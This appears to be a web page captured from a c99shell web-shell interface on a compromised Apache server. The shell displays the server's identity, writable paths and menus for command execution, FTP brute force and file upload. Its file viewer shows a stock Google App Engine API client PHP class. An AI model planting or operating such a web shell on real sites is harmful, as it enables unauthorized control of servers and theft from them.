!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/dokan/script/vendor/google/apiclient-services/src/Google/Service/   drwxrwxrwx
Free 13.08 GB of 57.97 GB (22.57%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Appengine.php (28.19 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

/**
 * Service definition for Appengine (v1).
 *
 * <p>
 * Provisions and manages developers' App Engine applications.</p>
 *
 * <p>
 * For more information about this service, see the API
 * <a href="https://cloud.google.com/appengine/docs/admin-api/" target="_blank">Documentation</a>
 * </p>
 *
 * @author Google, Inc.
 */
class Google_Service_Appengine extends Google_Service
{
  
/** View and manage your applications deployed on Google App Engine. */
  
const APPENGINE_ADMIN =
      
"https://www.googleapis.com/auth/appengine.admin";
  
/** See, edit, configure, and delete your Google Cloud Platform data. */
  
const CLOUD_PLATFORM =
      
"https://www.googleapis.com/auth/cloud-platform";
  
/** View your data across Google Cloud Platform services. */
  
const CLOUD_PLATFORM_READ_ONLY =
      
"https://www.googleapis.com/auth/cloud-platform.read-only";

  public 
$apps;
  public 
$apps_authorizedCertificates;
  public 
$apps_authorizedDomains;
  public 
$apps_domainMappings;
  public 
$apps_firewall_ingressRules;
  public 
$apps_locations;
  public 
$apps_operations;
  public 
$apps_services;
  public 
$apps_services_versions;
  public 
$apps_services_versions_instances;

  
/**
   * Constructs the internal representation of the Appengine service.
   *
   * @param Google_Client $client The client used to deliver requests.
   * @param string $rootUrl The root URL used for requests to the service.
   */
  
public function __construct(Google_Client $client$rootUrl null)
  {
    
parent::__construct($client);
    
$this->rootUrl $rootUrl ?: 'https://appengine.googleapis.com/';
    
$this->servicePath '';
    
$this->batchPath 'batch';
    
$this->version 'v1';
    
$this->serviceName 'appengine';

    
$this->apps = new Google_Service_Appengine_Resource_Apps(
        
$this,
        
$this->serviceName,
        
'apps',
        array(
          
'methods' => array(
            
'create' => array(
              
'path' => 'v1/apps',
              
'httpMethod' => 'POST',
              
'parameters' => array(),
            ),
'get' => array(
              
'path' => 'v1/apps/{appsId}',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'patch' => array(
              
'path' => 'v1/apps/{appsId}',
              
'httpMethod' => 'PATCH',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'updateMask' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
'repair' => array(
              
'path' => 'v1/apps/{appsId}:repair',
              
'httpMethod' => 'POST',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
          )
        )
    );
    
$this->apps_authorizedCertificates = new Google_Service_Appengine_Resource_AppsAuthorizedCertificates(
        
$this,
        
$this->serviceName,
        
'authorizedCertificates',
        array(
          
'methods' => array(
            
'create' => array(
              
'path' => 'v1/apps/{appsId}/authorizedCertificates',
              
'httpMethod' => 'POST',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'delete' => array(
              
'path' => 'v1/apps/{appsId}/authorizedCertificates/{authorizedCertificatesId}',
              
'httpMethod' => 'DELETE',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'authorizedCertificatesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'get' => array(
              
'path' => 'v1/apps/{appsId}/authorizedCertificates/{authorizedCertificatesId}',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'authorizedCertificatesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'view' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
'list' => array(
              
'path' => 'v1/apps/{appsId}/authorizedCertificates',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'pageSize' => array(
                  
'location' => 'query',
                  
'type' => 'integer',
                ),
                
'pageToken' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
                
'view' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
'patch' => array(
              
'path' => 'v1/apps/{appsId}/authorizedCertificates/{authorizedCertificatesId}',
              
'httpMethod' => 'PATCH',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'authorizedCertificatesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'updateMask' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
          )
        )
    );
    
$this->apps_authorizedDomains = new Google_Service_Appengine_Resource_AppsAuthorizedDomains(
        
$this,
        
$this->serviceName,
        
'authorizedDomains',
        array(
          
'methods' => array(
            
'list' => array(
              
'path' => 'v1/apps/{appsId}/authorizedDomains',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'pageSize' => array(
                  
'location' => 'query',
                  
'type' => 'integer',
                ),
                
'pageToken' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
          )
        )
    );
    
$this->apps_domainMappings = new Google_Service_Appengine_Resource_AppsDomainMappings(
        
$this,
        
$this->serviceName,
        
'domainMappings',
        array(
          
'methods' => array(
            
'create' => array(
              
'path' => 'v1/apps/{appsId}/domainMappings',
              
'httpMethod' => 'POST',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'overrideStrategy' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
'delete' => array(
              
'path' => 'v1/apps/{appsId}/domainMappings/{domainMappingsId}',
              
'httpMethod' => 'DELETE',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'domainMappingsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'get' => array(
              
'path' => 'v1/apps/{appsId}/domainMappings/{domainMappingsId}',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'domainMappingsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'list' => array(
              
'path' => 'v1/apps/{appsId}/domainMappings',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'pageSize' => array(
                  
'location' => 'query',
                  
'type' => 'integer',
                ),
                
'pageToken' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
'patch' => array(
              
'path' => 'v1/apps/{appsId}/domainMappings/{domainMappingsId}',
              
'httpMethod' => 'PATCH',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'domainMappingsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'updateMask' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
          )
        )
    );
    
$this->apps_firewall_ingressRules = new Google_Service_Appengine_Resource_AppsFirewallIngressRules(
        
$this,
        
$this->serviceName,
        
'ingressRules',
        array(
          
'methods' => array(
            
'batchUpdate' => array(
              
'path' => 'v1/apps/{appsId}/firewall/ingressRules:batchUpdate',
              
'httpMethod' => 'POST',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'create' => array(
              
'path' => 'v1/apps/{appsId}/firewall/ingressRules',
              
'httpMethod' => 'POST',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'delete' => array(
              
'path' => 'v1/apps/{appsId}/firewall/ingressRules/{ingressRulesId}',
              
'httpMethod' => 'DELETE',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'ingressRulesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'get' => array(
              
'path' => 'v1/apps/{appsId}/firewall/ingressRules/{ingressRulesId}',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'ingressRulesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'list' => array(
              
'path' => 'v1/apps/{appsId}/firewall/ingressRules',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'matchingAddress' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
                
'pageSize' => array(
                  
'location' => 'query',
                  
'type' => 'integer',
                ),
                
'pageToken' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
'patch' => array(
              
'path' => 'v1/apps/{appsId}/firewall/ingressRules/{ingressRulesId}',
              
'httpMethod' => 'PATCH',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'ingressRulesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'updateMask' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
          )
        )
    );
    
$this->apps_locations = new Google_Service_Appengine_Resource_AppsLocations(
        
$this,
        
$this->serviceName,
        
'locations',
        array(
          
'methods' => array(
            
'get' => array(
              
'path' => 'v1/apps/{appsId}/locations/{locationsId}',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'locationsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'list' => array(
              
'path' => 'v1/apps/{appsId}/locations',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'filter' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
                
'pageSize' => array(
                  
'location' => 'query',
                  
'type' => 'integer',
                ),
                
'pageToken' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
          )
        )
    );
    
$this->apps_operations = new Google_Service_Appengine_Resource_AppsOperations(
        
$this,
        
$this->serviceName,
        
'operations',
        array(
          
'methods' => array(
            
'get' => array(
              
'path' => 'v1/apps/{appsId}/operations/{operationsId}',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'operationsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'list' => array(
              
'path' => 'v1/apps/{appsId}/operations',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'filter' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
                
'pageSize' => array(
                  
'location' => 'query',
                  
'type' => 'integer',
                ),
                
'pageToken' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
          )
        )
    );
    
$this->apps_services = new Google_Service_Appengine_Resource_AppsServices(
        
$this,
        
$this->serviceName,
        
'services',
        array(
          
'methods' => array(
            
'delete' => array(
              
'path' => 'v1/apps/{appsId}/services/{servicesId}',
              
'httpMethod' => 'DELETE',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'servicesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'get' => array(
              
'path' => 'v1/apps/{appsId}/services/{servicesId}',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'servicesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'list' => array(
              
'path' => 'v1/apps/{appsId}/services',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'pageSize' => array(
                  
'location' => 'query',
                  
'type' => 'integer',
                ),
                
'pageToken' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
'patch' => array(
              
'path' => 'v1/apps/{appsId}/services/{servicesId}',
              
'httpMethod' => 'PATCH',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'servicesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'migrateTraffic' => array(
                  
'location' => 'query',
                  
'type' => 'boolean',
                ),
                
'updateMask' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
          )
        )
    );
    
$this->apps_services_versions = new Google_Service_Appengine_Resource_AppsServicesVersions(
        
$this,
        
$this->serviceName,
        
'versions',
        array(
          
'methods' => array(
            
'create' => array(
              
'path' => 'v1/apps/{appsId}/services/{servicesId}/versions',
              
'httpMethod' => 'POST',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'servicesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'delete' => array(
              
'path' => 'v1/apps/{appsId}/services/{servicesId}/versions/{versionsId}',
              
'httpMethod' => 'DELETE',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'servicesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'versionsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'get' => array(
              
'path' => 'v1/apps/{appsId}/services/{servicesId}/versions/{versionsId}',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'servicesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'versionsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'view' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
'list' => array(
              
'path' => 'v1/apps/{appsId}/services/{servicesId}/versions',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'servicesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'pageSize' => array(
                  
'location' => 'query',
                  
'type' => 'integer',
                ),
                
'pageToken' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
                
'view' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
'patch' => array(
              
'path' => 'v1/apps/{appsId}/services/{servicesId}/versions/{versionsId}',
              
'httpMethod' => 'PATCH',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'servicesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'versionsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'updateMask' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
          )
        )
    );
    
$this->apps_services_versions_instances = new Google_Service_Appengine_Resource_AppsServicesVersionsInstances(
        
$this,
        
$this->serviceName,
        
'instances',
        array(
          
'methods' => array(
            
'debug' => array(
              
'path' => 'v1/apps/{appsId}/services/{servicesId}/versions/{versionsId}/instances/{instancesId}:debug',
              
'httpMethod' => 'POST',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'servicesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'versionsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'instancesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'delete' => array(
              
'path' => 'v1/apps/{appsId}/services/{servicesId}/versions/{versionsId}/instances/{instancesId}',
              
'httpMethod' => 'DELETE',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'servicesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'versionsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'instancesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'get' => array(
              
'path' => 'v1/apps/{appsId}/services/{servicesId}/versions/{versionsId}/instances/{instancesId}',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'servicesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'versionsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'instancesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'list' => array(
              
'path' => 'v1/apps/{appsId}/services/{servicesId}/versions/{versionsId}/instances',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'appsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'servicesId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'versionsId' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'pageSize' => array(
                  
'location' => 'query',
                  
'type' => 'integer',
                ),
                
'pageToken' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
          )
        )
    );
  }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0208 ]--